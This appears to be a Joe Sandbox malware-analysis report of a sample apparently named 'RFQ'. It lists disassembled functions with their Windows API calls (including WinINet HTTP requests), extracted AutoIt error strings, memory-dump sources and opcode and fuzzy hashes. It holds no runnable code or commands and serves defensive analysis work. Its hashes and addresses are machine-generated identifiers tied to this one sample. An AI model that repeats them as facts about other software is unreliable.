                                                                            • Opcode ID: 3b7fab43c5d2df0643a62be2fa713a1082ef321027a4c5c9be12bafee4cc23e0
                                                                            • Instruction ID: 78208fbc65b9f163e61cf8a8b798a8424e4452a35657d43b1df15164087004be
                                                                            • Opcode Fuzzy Hash: 3b7fab43c5d2df0643a62be2fa713a1082ef321027a4c5c9be12bafee4cc23e0
                                                                            • Instruction Fuzzy Hash: D941D132B163928B8B14DE7BC8D44ABB3E3BF95710B60062DE58197785EF21DD09C790
                                                                            Function 006E448E Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 155COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen
                                                                            • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                            • API String ID: 176396367-1994484594
                                                                            • Opcode ID: 226ea31d24e7b13aab21fe9237731b69c4401414571aa154f897b5b10952ef0f
                                                                            • Instruction ID: e55906138f02212c8fdc8b00a6f41ab2151e7fe501622fb10ab0935a6bb85790
                                                                            • Opcode Fuzzy Hash: 226ea31d24e7b13aab21fe9237731b69c4401414571aa154f897b5b10952ef0f
                                                                            • Instruction Fuzzy Hash: 78410532B163A28B8B14DE7BC9D04BA73D3BF95714B60062CE48197785FF21DD099790
                                                                            Function 006E4671 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 152COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00683536: _wcslen.LIBCMT ref: 00683541
                                                                              • Part of subcall function 006E3F58: CharUpperBuffW.USER32(?,?,00000000,0071D0D0,?,?,00000001,?,?,006E4286,?,?,?,?,00000000,0071D0D0), ref: 006E3FE5
                                                                            • _wcslen.LIBCMT ref: 006E4296
                                                                            • _wcslen.LIBCMT ref: 006E42F0
                                                                            • _wcslen.LIBCMT ref: 006E4337
                                                                            • _wcslen.LIBCMT ref: 006E437B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$BuffCharUpper
                                                                            • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                            • API String ID: 1256254125-1994484594
                                                                            • Opcode ID: 7dbac9f6eedff2be813590c57f4d3370fc097222b1d222c963ff2c0f45889310
                                                                            • Instruction ID: 20071bd6ec2ab22ad676a715f876e2560d3270fffebd428ea53ba3d5b53db07f
                                                                            • Opcode Fuzzy Hash: 7dbac9f6eedff2be813590c57f4d3370fc097222b1d222c963ff2c0f45889310
                                                                            • Instruction Fuzzy Hash: 2541E232B163A28B8B14DE7BC8D44BA73E3BF95710B60062DE48197785EF61DE09C791
                                                                            Function 006B53BE Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,006B5B33,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 006B5400
                                                                            • __fassign.LIBCMT ref: 006B547B
                                                                            • __fassign.LIBCMT ref: 006B5496
                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 006B54BC
                                                                            • WriteFile.KERNEL32(?,FF8BC35D,00000000,3[k,00000000,?,?,?,?,?,?,?,?,?,006B5B33,?), ref: 006B54DB
                                                                            • WriteFile.KERNEL32(?,?,00000001,3[k,00000000,?,?,?,?,?,?,?,?,?,006B5B33,?), ref: 006B5514
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                            • String ID: 3[k
                                                                            • API String ID: 1324828854-1514389140
                                                                            • Opcode ID: 8ab0f3a64d515eae8c30a5c58c0beaff265117c5a48cb2f636679c36bdf8dcef
                                                                            • Instruction ID: 66734b98c8c2404f07fb120e93ddb65f80c4cc6780ccea12fdec7e6462d4bdb2
                                                                            • Opcode Fuzzy Hash: 8ab0f3a64d515eae8c30a5c58c0beaff265117c5a48cb2f636679c36bdf8dcef
                                                                            • Instruction Fuzzy Hash: FF51F9B1A00249AFDB20CFA8D841BEEBBF6FF09301F14415AE556E7391D7309981CB54
                                                                            Function 006F34BA Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 006F3502
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                            • LoadStringW.USER32(?,?,00000FFF,?), ref: 006F3528
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString$_wcslen
                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 4099089115-2391861430
                                                                            • Opcode ID: c98f55d2ea9fd5997148a77ba86fcaf0ad3026ef58ffc1e2bc61a7e618a16e3e
                                                                            • Instruction ID: 2c8c56f89b107556b88c82d0ccfb467c56d0dec506ce6dd2fecf3c127811d520
                                                                            • Opcode Fuzzy Hash: c98f55d2ea9fd5997148a77ba86fcaf0ad3026ef58ffc1e2bc61a7e618a16e3e
                                                                            • Instruction Fuzzy Hash: 04517E71800219ABCF54FBE0CC52EEEBB36AF14301F044229F505722A1EB745B99DF69
                                                                            Function 006E46DC Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 148COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen
                                                                            • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                            • API String ID: 176396367-1994484594
                                                                            • Opcode ID: ae1849c71f0464b2fc6ab64c9442588b54f50709c78159f1113ee42a3b9da5a0
                                                                            • Instruction ID: 88318c82fe8667e5ff2e9608522a5d2e5cb543dcf5fd89ac7865478064ce940d
                                                                            • Opcode Fuzzy Hash: ae1849c71f0464b2fc6ab64c9442588b54f50709c78159f1113ee42a3b9da5a0
                                                                            • Instruction Fuzzy Hash: 3C41DF32B063A28B8B249E7B89D04BB73E3AF95714B60052DE48197785FF20DD0987A1
                                                                            Function 00718CBB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 145windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?), ref: 00718D0F
                                                                              • Part of subcall function 00717D90: IsWindow.USER32(01355690), ref: 00717E29
                                                                              • Part of subcall function 00717D90: IsWindowEnabled.USER32(01355690), ref: 00717E35
                                                                            • GetMenuItemInfoW.USER32(?,?,?,?), ref: 00718DC1
                                                                            • GetMenuItemCount.USER32(?), ref: 00718DDE
                                                                            • GetMenuItemID.USER32(?), ref: 00718DEE
                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00718E20
                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00718E62
                                                                            • CheckMenuRadioItem.USER32(?,?,?,?,00000400), ref: 00718E93
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$Window$CheckCountEnabledProcRadio
                                                                            • String ID: 0
                                                                            • API String ID: 4045175071-4108050209
                                                                            • Opcode ID: 04b6e3d71d8c673f0e6109c877dddd93c39175536b0d9eea208ca518beec63c0
                                                                            • Instruction ID: b7c220ca8e4e3148dc16418e4c524bbf67a1ac3f4b4061234db718b324859092
                                                                            • Opcode Fuzzy Hash: 04b6e3d71d8c673f0e6109c877dddd93c39175536b0d9eea208ca518beec63c0
                                                                            • Instruction Fuzzy Hash: 4651B0716043019FD750CF18D888AEBBBE8FF88754F04495DF994A7191CB79E988CBA2
                                                                            Function 006E4646 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 136COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006E3F58: CharUpperBuffW.USER32(?,?,00000000,0071D0D0,?,?,00000001,?,?,006E4286,?,?,?,?,00000000,0071D0D0), ref: 006E3FE5
                                                                            • _wcslen.LIBCMT ref: 006E4296
                                                                            • _wcslen.LIBCMT ref: 006E42F0
                                                                            • _wcslen.LIBCMT ref: 006E4337
                                                                            • _wcslen.LIBCMT ref: 006E437B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$BuffCharUpper
                                                                            • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                            • API String ID: 1256254125-1994484594
                                                                            • Opcode ID: c81c1a8d2d462248e74899fec792f45ff5be1a7802d48ce40e1f9b3d78dd7e9d
                                                                            • Instruction ID: f46690bea7cab10e09af2e28926faf7ae87c25ef86e6cea4b97261e24bb0bb18
                                                                            • Opcode Fuzzy Hash: c81c1a8d2d462248e74899fec792f45ff5be1a7802d48ce40e1f9b3d78dd7e9d
                                                                            • Instruction Fuzzy Hash: C041F332B063A28B8B149E7BC5C44BB77E3BF95710B60052DE48197745EF20ED058BA0
                                                                            Function 006FC171 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006FC190
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006FC1B8
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 006FC1E8
                                                                            • GetLastError.KERNEL32 ref: 006FC240
                                                                            • SetEvent.KERNEL32(?), ref: 006FC254
                                                                            • InternetCloseHandle.WININET(00000000), ref: 006FC25F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                            • String ID:
                                                                            • API String ID: 3113390036-3916222277
                                                                            • Opcode ID: 05063c540a017bdb1981fda31718f337b29110019d2cc15c2358ee3aff6963a7
                                                                            • Instruction ID: 37a493dec1997ffe05f69f7b9fe50bc8ba89a74c217ebf6cc4e66d790d6b3cdd
                                                                            • Opcode Fuzzy Hash: 05063c540a017bdb1981fda31718f337b29110019d2cc15c2358ee3aff6963a7
                                                                            • Instruction Fuzzy Hash: 74319F7150020CAFD7229FA88D89ABB7BFDFF49760B14851EF54692240DB34EE059B64
                                                                            Function 006E97B9 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,006C47E6,?,?,Bad directive syntax error,0071D0D0,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 006E97DA
                                                                            • LoadStringW.USER32(00000000,?,006C47E6,?), ref: 006E97E1
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 006E98A5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadMessageModuleString_wcslen
                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                            • API String ID: 858772685-4153970271
                                                                            • Opcode ID: 45c4ef6fde95d094e251007fb5dea1f70abd2702a8f526ea648d03f286b970e4
                                                                            • Instruction ID: 31c4187d9a14346e0304614939e8e67774ce643127480a372babf10de90e74ce
                                                                            • Opcode Fuzzy Hash: 45c4ef6fde95d094e251007fb5dea1f70abd2702a8f526ea648d03f286b970e4
                                                                            • Instruction Fuzzy Hash: 6D219C7180021AEBCF11BF94CC4AEEE773ABF19300F04442AF516620A2EB759618DF65
                                                                            Function 006B8CE5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d05c7c094e73a9039c4669c9c0e6e27a10777e2e1820ac6090340a38207de07c
                                                                            • Instruction ID: 540ee354c60157ae1c8e83680f54174bee10837f1d05515865d553bf8606c118
                                                                            • Opcode Fuzzy Hash: d05c7c094e73a9039c4669c9c0e6e27a10777e2e1820ac6090340a38207de07c
                                                                            • Instruction Fuzzy Hash: E8C1E3B4A043459FDB51EFE8D841BEDBBBAAF1A310F08419DE514A7392CB348981CF65
                                                                            Function 006876AA Relevance: 13.8, APIs: 9, Instructions: 291COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?), ref: 006876D0
                                                                            • GetWindowRect.USER32(?,?), ref: 00687711
                                                                            • ScreenToClient.USER32(?,?), ref: 00687739
                                                                            • GetClientRect.USER32(?,?), ref: 0068787D
                                                                            • GetWindowRect.USER32(?,?), ref: 0068789E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Client$Window$Screen
                                                                            • String ID:
                                                                            • API String ID: 1296646539-0
                                                                            • Opcode ID: 873936a25640d70319198ea8dab16d96ca4d27bd2b4c5417640045b0fd625492
                                                                            • Instruction ID: 529b87516056dd6cc6cf1b63af6346ace6871803ca3742b8864ebb19cc6127fb
                                                                            • Opcode Fuzzy Hash: 873936a25640d70319198ea8dab16d96ca4d27bd2b4c5417640045b0fd625492
                                                                            • Instruction Fuzzy Hash: FEC16C7590464AEFDB10DFA8C884BEDB7F2FF18310F24851AE896A3250D734E991DB60
                                                                            Function 006BCE30 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                            • String ID:
                                                                            • API String ID: 1282221369-0
                                                                            • Opcode ID: 599c9a7fe5415377077f697bbb63d36187c67d5b4a84d5d3dc7b469a91d5132c
                                                                            • Instruction ID: a961ebe4148d7f72c682344071ed08f521ac2961581dc9b0d02bfe0979756910
                                                                            • Opcode Fuzzy Hash: 599c9a7fe5415377077f697bbb63d36187c67d5b4a84d5d3dc7b469a91d5132c
                                                                            • Instruction Fuzzy Hash: E1610BF1A04306AFDB20AFB498916FA7BEBEF01730F04416DF94497381DA359AC28794
                                                                            Function 00715009 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 007150BB
                                                                            • ShowWindow.USER32(?,00000000), ref: 007150FC
                                                                            • ShowWindow.USER32(?,00000005,?,00000000), ref: 00715102
                                                                            • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00715106
                                                                              • Part of subcall function 00716E88: DeleteObject.GDI32(00000000), ref: 00716EB4
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00715142
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0071514F
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00715182
                                                                            • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 007151BC
                                                                            • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 007151CB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                            • String ID:
                                                                            • API String ID: 3210457359-0
                                                                            • Opcode ID: 17115e6a3155e236a0d143118e19b934ffdcb38b6a5039b69b94c392b2908968
                                                                            • Instruction ID: 7e1298cc39c657fd2e16e6fcc0c9a17ad1d5c7fac39519647d2a63ec3ca09c92
                                                                            • Opcode Fuzzy Hash: 17115e6a3155e236a0d143118e19b934ffdcb38b6a5039b69b94c392b2908968
                                                                            • Instruction Fuzzy Hash: A2519530A40609FFEF299F7CCC4AFD93766EB48350F148115BA25961E1C77999D0AB81
                                                                            Function 0069A07B Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 006D72E3
                                                                            • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 006D72FC
                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 006D730C
                                                                            • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 006D7324
                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 006D7345
                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,0069A05E,00000000,00000000,00000000,000000FF,00000000), ref: 006D7354
                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 006D7371
                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,0069A05E,00000000,00000000,00000000,000000FF,00000000), ref: 006D7380
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                            • String ID:
                                                                            • API String ID: 1268354404-0
                                                                            • Opcode ID: 8c08130700737989b715e5941ea9937932d50c5a71cb006e8b462a95425b4823
                                                                            • Instruction ID: 28188c8469e37483013574040a3b9561afa82955a6d3c6053221f0626bf1b7b2
                                                                            • Opcode Fuzzy Hash: 8c08130700737989b715e5941ea9937932d50c5a71cb006e8b462a95425b4823
                                                                            • Instruction Fuzzy Hash: DC517A30A40205AFDF20CFA9CC45FAA7BFAEB48750F108519F902976E0E774E990DB95
                                                                            Function 006FC061 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006FC0A0
                                                                            • GetLastError.KERNEL32 ref: 006FC0B3
                                                                            • SetEvent.KERNEL32(?), ref: 006FC0C7
                                                                              • Part of subcall function 006FC171: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006FC190
                                                                              • Part of subcall function 006FC171: GetLastError.KERNEL32 ref: 006FC240
                                                                              • Part of subcall function 006FC171: SetEvent.KERNEL32(?), ref: 006FC254
                                                                              • Part of subcall function 006FC171: InternetCloseHandle.WININET(00000000), ref: 006FC25F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
